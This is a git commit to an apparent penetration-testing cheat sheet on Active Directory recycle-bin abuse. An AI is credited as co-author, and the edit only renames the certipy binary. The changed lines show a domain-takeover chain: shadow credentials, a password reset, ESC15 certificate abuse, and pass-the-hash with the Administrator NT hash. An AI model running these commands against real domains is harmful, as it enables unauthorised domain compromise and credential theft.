commit 12a7228c797ba17d1c6e595b37fb919a918926c0
parent f2b790878056e40e0c034518a748f2b7f2b5f9b6
Author: DAEMON <zer0sec.xp@icloud.com>
Date: Sun, 20 Sep 2026 04:17:32 +0100
recycle-bin: use certipy-ad, the real binary name
The Kali package installs the binary as certipy-ad (certipy is a local alias), so the sheet now shows certipy-ad for reproducibility.
Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
Diffstat:
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/src/content/sheets/active-directory/ad-recycle-bin-enumeration.md b/src/content/sheets/active-directory/ad-recycle-bin-enumeration.md
@@ -120,7 +120,7 @@ Get-ADUser -Identity <restored> | Select-Object SamAccountName,Enabled,Distingui
If you control the restored object (e.g. `GenericAll` over its OU covers restored children too), take it over — reset the password or add shadow credentials:
```bash
-certipy shadow auto -target "$DC" -u "$U" -p "$P" -account <restored>
+certipy-ad shadow auto -target "$DC" -u "$U" -p "$P" -account <restored>
# or: bloodyAD -u "$U" -d "$DOMAIN" -p "$P" --host "$DC" set password <restored> '<NewPass123!>'
```
@@ -130,12 +130,12 @@ A restored account brings back **rights the live tree was hiding** — group mem
```bash
# enumerate templates as the restored principal
-certipy find -target "$DC" -u <restored> -p '<pw>' -vulnerable -stdout
+certipy-ad find -target "$DC" -u <restored> -p '<pw>' -vulnerable -stdout
# e.g. ESC15 (CVE-2024-49019) on a schema-v1 template that supplies its own subject:
-certipy req -u <restored>@$DOMAIN -p '<pw>' -dc-ip "$DC" -target "$DC" \
+certipy-ad req -u <restored>@$DOMAIN -p '<pw>' -dc-ip "$DC" -target "$DC" \
-ca '<CA-NAME>' -template '<VULN-TEMPLATE>' \
-upn administrator@$DOMAIN -application-policies 'Client Authentication'
-certipy auth -pfx administrator.pfx -username administrator -domain "$DOMAIN" -dc-ip "$DC"
+certipy-ad auth -pfx administrator.pfx -username administrator -domain "$DOMAIN" -dc-ip "$DC"
# -> Administrator NT hash -> pass-the-hash
```